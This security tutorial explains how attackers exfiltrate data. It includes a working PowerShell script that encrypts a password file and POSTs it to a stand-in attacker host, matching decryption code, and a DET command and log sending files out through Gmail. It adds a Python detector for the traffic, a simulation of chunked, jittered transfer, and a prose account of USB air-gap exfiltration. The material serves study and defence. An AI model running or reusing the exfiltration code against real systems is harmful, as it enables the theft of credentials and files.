Before the actual data exfiltration takes place, attackers usually compress, encrypt or encode the payload that is about to be sent to their server. This is done either by the backdoor itself or with a third-party tool such as the WinRAR archiver. These techniques reduce the volume of data leaving the network and obscure its contents so that content-based network monitoring does not recognise it.
The following basic example of data exfiltration relies on PowerShell. The proof-of-concept code reads a file from the local system, encrypts it with AES via ConvertFrom-SecureString (the number of bytes passed to -Key selects AES-128, -192 or -256; the 32 ASCII bytes used here give AES-256) and sends it to the attacker's server as an HTTP POST on port 80. Because the traffic looks like an ordinary web request, in most environments it raises no alarm and can therefore be used for stealthy exfiltration.
# File to exfiltrate. Get-Content returns one string per line, so the line breaks
# are not preserved when the characters are appended below; add -Raw to keep them.
$file = Get-Content C:\Users\RayC\Desktop\facebook_password.txt
# 32 ASCII bytes give an AES-256 key; -Key accepts 16, 24 or 32 bytes.
$key = (New-Object System.Text.ASCIIEncoding).GetBytes("54b8617eca0e54c7d3c8e6732c6b687a")
# Copy the plaintext into a SecureString so that the cmdlet can encrypt it.
$secureString = New-Object System.Security.SecureString
foreach ($char in $file.ToCharArray()) {
    $secureString.AppendChar($char)
}
# Output is a fixed 32-hex marker followed by base64-encoded "2|<IV>|<hex ciphertext>".
$encryptedData = ConvertFrom-SecureString -SecureString $secureString -Key $key
# Plain HTTP POST on port 80; the encrypted blob is the request body.
Invoke-WebRequest -Uri http://www.attacker.host/exfil -Method POST -Body $encryptedData
Once the PowerShell code has executed, the following HTTP POST request is sent to the attacker's server.
POST /exfil HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.3; en-GB) WindowsPowerShell/4.0
Content-Type: application/x-www-form-urlencoded
Host: www.attacker.host
Content-Length: 704
Expect: 100-continue
Connection: Keep-Alive
76492d1116743f0423413b16050a5345MgB8AEIANQBHADAAUgA0AEgAbABOAE8AcwA4AFMAWAB5AG4AKwBEAHQAdgBrAGcAPQA9AHwAMgBiAGIANQBhADgANgA0AGEAZgBhAGEANwA2ADMAMwA4ADAANABjADUAYQA5ADAAMAA1AGIAMAA4ADgANwAyADkAYgA0ADEAMgBjADcAYQA3ADcAYQAyADcANQAyADUANQA4ADgANAA4AGEAOQA4AGUAMwA1ADkANwA5AGQAYQA4ADcAMABjADIAOAA3ADIANQA5ADMAZQBhAGEAOQBiADgAYQA0ADMAOAA3ADYAZQAwADYAZQBlADcAMQBlADQAZQA0ADkAMgBmADgAYQA5ADQANgA2ADcAMwBhADQANAA3AGYANABiAGQAYgAwADUAOABhADAANABjADkAYQBjAGQAZQBkAGMANQA2ADgAZAA5ADYAMAA4ADgANABhADUANwBiAGIAMABhAGUANAAyADcAYQAzADEANABkADMAYgA1AGUAYgAyADkAOQBiADcAYgA3ADIAMwBkADcANQA2AGMANABlADMAZQA5AGMANwA5ADMAMwA1ADEAMABmAGEAMQA0ADIAMgAxADcAZQA0AGUAZgA2AGQANgBlADkAMgBmADkAZgBiADkAOQBjADIAYQAxAGIAOAAyADkAOABmAA==
Decryption of the data is straightforward and can be performed with a few lines of PowerShell, as shown below; the last pipeline stage converts the recovered SecureString back into plain text.
# The same 32-byte key the sender used.
$key = (New-Object System.Text.ASCIIEncoding).GetBytes("54b8617eca0e54c7d3c8e6732c6b687a")
# The POST body captured above.
$encrypted = "76492d1116743f0423413b16050a5345MgB8AEIANQBHADAAUgA0AEgAbABOAE8AcwA4AFMAWAB5AG4AKwBEAHQAdgBrAGcAPQA9AHwAMgBiAGIANQBhADgANgA0AGEAZgBhAGEANwA2ADMAMwA4ADAANABjADUAYQA5ADAAMAA1AGIAMAA4ADgANwAyADkAYgA0ADEAMgBjADcAYQA3ADcAYQAyADcANQAyADUANQA4ADgANAA4AGEAOQA4AGUAMwA1ADkANwA5AGQAYQA4ADcAMABjADIAOAA3ADIANQA5ADMAZQBhAGEAOQBiADgAYQA0ADMAOAA3ADYAZQAwADYAZQBlADcAMQBlADQAZQA0ADkAMgBmADgAYQA5ADQANgA2ADcAMwBhADQANAA3AGYANABiAGQAYgAwADUAOABhADAANABjADkAYQBjAGQAZQBkAGMANQA2ADgAZAA5ADYAMAA4ADgANABhADUANwBiAGIAMABhAGUANAAyADcAYQAzADEANABkADMAYgA1AGUAYgAyADkAOQBiADcAYgA3ADIAMwBkADcANQA2AGMANABlADMAZQA5AGMANwA5ADMAMwA1ADEAMABmAGEAMQA0ADIAMgAxADcAZQA0AGUAZgA2AGQANgBlADkAMgBmADkAZgBiADkAOQBjADIAYQAxAGIAOAAyADkAOABmAA=="
# Rebuild the SecureString from the blob and marshal it back into a plain string.
echo $encrypted | ConvertTo-SecureString -Key $key | ForEach-Object {[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($_))}
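The POST body shown above has a fixed structure that a defender can recognise without knowing the key. The following Python script is an added example and not part of the original write-up: it parses the ConvertFrom-SecureString -Key container (the 32-hex-character marker followed by base64-encoded UTF-16LE text of the form version|IV|hex ciphertext), reports the ciphertext size, bounds the plaintext length that the padding allows (assuming the usual PKCS7 padding), and flags the request by its WindowsPowerShell user agent. The request embedded in the script is reconstructed from the capture above; the finding labels and the build_keyed_blob helper are this example's own.

```python
import base64

# Fixed 32-hex-character marker that ConvertFrom-SecureString prepends to its
# output when a -Key is supplied; it is the start of the POST body above.
KEYED_SECURESTRING_MARKER = "76492d1116743f0423413b16050a5345"

# Body of the captured POST request (copied from the capture above).
CAPTURED_BODY = "76492d1116743f0423413b16050a5345MgB8AEIANQBHADAAUgA0AEgAbABOAE8AcwA4AFMAWAB5AG4AKwBEAHQAdgBrAGcAPQA9AHwAMgBiAGIANQBhADgANgA0AGEAZgBhAGEANwA2ADMAMwA4ADAANABjADUAYQA5ADAAMAA1AGIAMAA4ADgANwAyADkAYgA0ADEAMgBjADcAYQA3ADcAYQAyADcANQAyADUANQA4ADgANAA4AGEAOQA4AGUAMwA1ADkANwA5AGQAYQA4ADcAMABjADIAOAA3ADIANQA5ADMAZQBhAGEAOQBiADgAYQA0ADMAOAA3ADYAZQAwADYAZQBlADcAMQBlADQAZQA0ADkAMgBmADgAYQA5ADQANgA2ADcAMwBhADQANAA3AGYANABiAGQAYgAwADUAOABhADAANABjADkAYQBjAGQAZQBkAGMANQA2ADgAZAA5ADYAMAA4ADgANABhADUANwBiAGIAMABhAGUANAAyADcAYQAzADEANABkADMAYgA1AGUAYgAyADkAOQBiADcAYgA3ADIAMwBkADcANQA2AGMANABlADMAZQA5AGMANwA5ADMAMwA1ADEAMABmAGEAMQA0ADIAMgAxADcAZQA0AGUAZgA2AGQANgBlADkAMgBmADkAZgBiADkAOQBjADIAYQAxAGIAOAAyADkAOABmAA=="

# Constructed sample request: headers as in the capture, body as above.
SAMPLE_REQUEST = (
    "POST /exfil HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.3; en-GB) WindowsPowerShell/4.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: www.attacker.host\r\n"
    f"Content-Length: {len(CAPTURED_BODY)}\r\n"
    "Expect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n" + CAPTURED_BODY
)


def parse_keyed_blob(blob: str) -> dict:
    """Split a keyed SecureString export into version, IV and ciphertext.

    Layout: 32-hex marker, then base64 of the UTF-16LE string
    "<version>|<base64 IV>|<hex ciphertext>". No decryption is attempted.
    """
    blob = blob.strip()
    if not blob.lower().startswith(KEYED_SECURESTRING_MARKER):
        raise ValueError("missing ConvertFrom-SecureString -Key marker")
    inner = base64.b64decode(blob[32:], validate=True).decode("utf-16-le")
    version, iv_b64, ct_hex = inner.split("|")
    iv = base64.b64decode(iv_b64, validate=True)
    ciphertext = bytes.fromhex(ct_hex)
    if len(iv) != 16 or len(ciphertext) % 16:
        raise ValueError("IV or ciphertext is not AES block aligned")
    return {"version": version, "iv": iv, "ciphertext": ciphertext}


def build_keyed_blob(iv: bytes, ciphertext: bytes, version: str = "2") -> str:
    """Inverse of parse_keyed_blob (example helper): wrap an IV and ciphertext
    in the container. The caller supplies the AES output; nothing is encrypted."""
    inner = f"{version}|{base64.b64encode(iv).decode()}|{ciphertext.hex()}"
    return KEYED_SECURESTRING_MARKER + base64.b64encode(inner.encode("utf-16-le")).decode()


def plaintext_char_bounds(ciphertext_len: int) -> tuple:
    """Possible SecureString length in UTF-16 code units. With PKCS7 padding the
    plaintext is ciphertext_len-16 .. ciphertext_len-1 bytes, two per character."""
    return (ciphertext_len - 16) // 2, (ciphertext_len - 1) // 2


def inspect_http_request(raw: str) -> list:
    """Return detection findings (example labels) for one raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    findings = []
    if "windowspowershell/" in headers.get("user-agent", "").lower():
        findings.append("powershell-user-agent")
    if request_line.startswith("POST") and body.lower().startswith(KEYED_SECURESTRING_MARKER):
        try:
            parsed = parse_keyed_blob(body)
        except ValueError:
            findings.append("securestring-marker-malformed")
        else:
            lo, hi = plaintext_char_bounds(len(parsed["ciphertext"]))
            findings.append(
                f"keyed-securestring-body:{len(parsed['ciphertext'])}B-ciphertext:{lo}-{hi}chars"
            )
    return findings


if __name__ == "__main__":
    for finding in inspect_http_request(SAMPLE_REQUEST):
        print(finding)
```

For the captured body the parser yields 112 bytes of ciphertext, i.e. seven AES blocks, which bounds the exfiltrated SecureString to between 48 and 55 characters; the two lines recovered later on this page total 48 characters, matching the lower bound because a full padding block was appended. The marker check is cheap enough to run on every outbound POST body, and the user-agent check catches the default Invoke-WebRequest client string even when the body is encoded differently.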
Other common techniques for exfiltrating data include the SMTP/IMAP and DNS protocols. The Data Exfiltration Toolkit (DET) illustrates such techniques: it supports a wide range of transports, from basic exfiltration over a TCP or UDP tunnel to cloud-based services such as Gmail, Twitter or Google Docs. DET can compress and AES-encrypt the payload beforehand. In addition, the ability to set random time intervals between data bursts and the size of each burst lets the exfiltration traffic blend into the regular network traffic generated by the user, which makes identification of the leak difficult. The following command line and output show an attempt to exfiltrate data over SMTP using a predefined mailbox.
C:\Users\RayC\>det.py -c config -f Desktop\facebook_password.txt -p gmail
[2016-08-28.19:43:03] CTRL+C to kill DET
[2016-08-28.19:43:03] Launching thread for file Desktop\facebook_password.txt
[2016-08-28.19:43:03] Using gmail as transport method
[2016-08-28.19:43:03] [!] Registering packet for the file
[2016-08-28.19:43:04] [gmail] Sending 77 bytes in mail
[2016-08-28.19:43:05] Sleeping for 1 seconds
[2016-08-28.19:43:06] Using gmail as transport method
[2016-08-28.19:43:06] [gmail] Sending 174 bytes in mail
[2016-08-28.19:43:07] Sleeping for 1 seconds
[2016-08-28.19:43:08] Using gmail as transport method
[2016-08-28.19:43:09] [gmail] Sending 18 bytes in mail
Meanwhile, on the attacker's server a DET listener is running and monitoring the same mailbox for incoming files.
$ det.py -c config -L -p gmail
[2016-08-28.19:46:04] CTRL+C to kill DET
[2016-08-28.19:46:04] [gmail] Listening for mails...
[2016-08-28.19:46:08] Received 77 bytes
[2016-08-28.19:46:08] Register packet for file facebook_password.txt with checksum 420f595dce0dd2f9d54f66764766f699
[2016-08-28.19:46:11] Received 174 bytes
[2016-08-28.19:46:13] Received 18 bytes
[2016-08-28.19:46:13] File facebook_password.txt recovered
[2016-08-28.19:46:18] Killing DET and its subprocesses
$ cat facebook_password.txt
username: johndoe
password: YouWillNewverGuess!!!
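To make the sender and listener output above concrete, the following Python script is an added example and not DET's own code: it models a DET-style transfer as a register packet carrying the file name and checksum, a sequence of data bursts, and a final marker, with the listener reassembling the chunks and verifying the checksum before it reports the file as recovered. The packet layout, burst size and sleep range are assumptions of this example; zlib stands in for DET's compression, the AES layer is omitted so the script runs with the standard library only, and the file contents are constructed to match the recovered file shown above.

```python
import hashlib
import random
import zlib

# Constructed sample matching the file recovered in the listener output above.
SAMPLE_FILE = b"username: johndoe\npassword: YouWillNewverGuess!!!\n"


def make_packets(filename: str, data: bytes, burst_size: int) -> list:
    """Split a file into bursts the way the DET log shows: one register packet
    with name, checksum and chunk count, numbered data chunks, then a final
    marker. zlib stands in for the tool's compression; nothing is encrypted."""
    payload = zlib.compress(data)
    chunks = [payload[i:i + burst_size] for i in range(0, len(payload), burst_size)]
    packets = [("REGISTER", filename, hashlib.md5(data).hexdigest(), len(chunks))]
    packets += [("DATA", filename, seq, chunk) for seq, chunk in enumerate(chunks)]
    packets.append(("DONE", filename))
    return packets


def jitter_schedule(count: int, min_s: float, max_s: float, seed: int) -> list:
    """Random pause before each burst; a fixed seed keeps the example repeatable."""
    rng = random.Random(seed)
    return [round(rng.uniform(min_s, max_s), 2) for _ in range(count)]


class Listener:
    """Receiver side: reassembles chunks per file and verifies the checksum."""

    def __init__(self) -> None:
        self.pending = {}    # filename -> {"checksum", "count", "chunks"}
        self.recovered = {}  # filename -> bytes

    def receive(self, packet: tuple) -> str:
        kind, filename = packet[0], packet[1]
        if kind == "REGISTER":
            _, _, checksum, count = packet
            self.pending[filename] = {"checksum": checksum, "count": count, "chunks": {}}
            return f"Register packet for file {filename} with checksum {checksum}"
        if filename not in self.pending:
            return f"Ignoring {kind} packet for unregistered file {filename}"
        if kind == "DATA":
            _, _, seq, chunk = packet
            self.pending[filename]["chunks"][seq] = chunk
            return f"Received chunk {seq} ({len(chunk)} bytes)"
        if kind == "DONE":
            entry = self.pending[filename]
            missing = [i for i in range(entry["count"]) if i not in entry["chunks"]]
            if missing:
                return f"File {filename} incomplete, missing chunks {missing}"
            data = zlib.decompress(b"".join(entry["chunks"][i] for i in range(entry["count"])))
            if hashlib.md5(data).hexdigest() != entry["checksum"]:
                return f"File {filename} checksum mismatch"
            self.recovered[filename] = data
            del self.pending[filename]
            return f"File {filename} recovered"
        raise ValueError(f"unknown packet type {kind!r}")


def simulate_transfer(filename: str, data: bytes, burst_size: int = 32,
                      min_s: float = 1, max_s: float = 5, seed: int = 0) -> tuple:
    """Drive sender and listener in-process without real sleeping.
    Returns (log lines, recovered bytes or None)."""
    packets = make_packets(filename, data, burst_size)
    listener = Listener()
    log = []
    for pause, packet in zip(jitter_schedule(len(packets), min_s, max_s, seed), packets):
        log.append(f"Sleeping for {pause} seconds")
        log.append(listener.receive(packet))
    return log, listener.recovered.get(filename)


if __name__ == "__main__":
    lines, recovered = simulate_transfer("facebook_password.txt", SAMPLE_FILE, burst_size=16)
    print("\n".join(lines))
    print(recovered.decode())
```

The register packet is what lets the listener decide when a file is complete and whether it arrived intact; dropping any data chunk makes the DONE packet report the missing sequence numbers instead of recovering the file. From the defender's side the same structure is the tell: a short first message, a run of similarly sized messages separated by irregular pauses, and a short closing message, all to the same mailbox.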
Sometimes the information that interests attackers is located on networks with no internet access. In such cases adversaries deploy more sophisticated malware that is able to breach those air-gapped networks and exfiltrate data. While various studies have been conducted to invent and validate techniques for data exfiltration from air-gapped networks, the most common technique used in the wild is USB-drive-based exfiltration. It relies on infecting a USB drive on an internet-connected computer, which later results in the infection of an isolated system when the infected drive is attached to it. After the malware has collected files from the air-gapped system, it stores them on the same USB drive so that they can be retrieved when the drive is inserted into the initial system again. From this point, any of the previously mentioned techniques can be used to exfiltrate the collected information from the target's infrastructure.